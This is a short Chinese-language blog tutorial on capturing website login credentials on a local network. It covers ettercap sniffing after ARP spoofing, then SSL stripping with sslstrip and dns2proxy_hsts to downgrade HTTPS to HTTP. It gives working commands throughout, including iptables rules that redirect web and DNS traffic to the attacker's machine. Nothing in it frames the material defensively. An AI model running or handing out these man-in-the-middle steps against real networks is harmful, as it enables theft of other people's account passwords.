首页 网络安全

1,ettercap嗅探HTTP网站帐号密码
ettercap是个“神器”,本文重点不在于此,故不去详细介绍。

开启路由转发、arpspoof双向欺骗不多赘述,一切就绪之后,另一终端下使用如下命令:

sudo  ettercap -Tq -i wlo1

T代表命令行界面而非GUI显示,q代表不显示数据包内容,i指定监听网卡。

2020-10-07_22-50.png

2,sslstrip+dns2proxy_hsts嗅探HTTPS网站帐号密码

先把工具的链接奉上:

sslstrip:Kali下自带;如果是其他Linux版本,使用sudo apt install sslstrip命令安装即可。

sslstrip2 :作者因为某些原因删掉了原来的代码,这是我在另一处找到的。(你也可以选择使用sslstrip)

dns2proxy_hsts

嗅探HTTPS网站的帐号密码的思想就是将HTTPS降成HTTP,之后再嗅探HTTP网站的帐号密码。

首先,在attacker本机上进行端口映射(有关iptables的知识可以参考这篇文章 ,本文重点不在于iptables):

 iptables --flush
 iptables --flush -t nat
 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8888
 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

前2条命令是在做清理工作,后2条命令才是进行端口映射。之后到dns2proxy_hsts目录下,执行(如果它依赖的dns库没有安装的话,使用sudo pip install dnspython安装即可):

python2 dns2proxy.py

https://www.freebuf.com/articles/network/207238.html




文章评论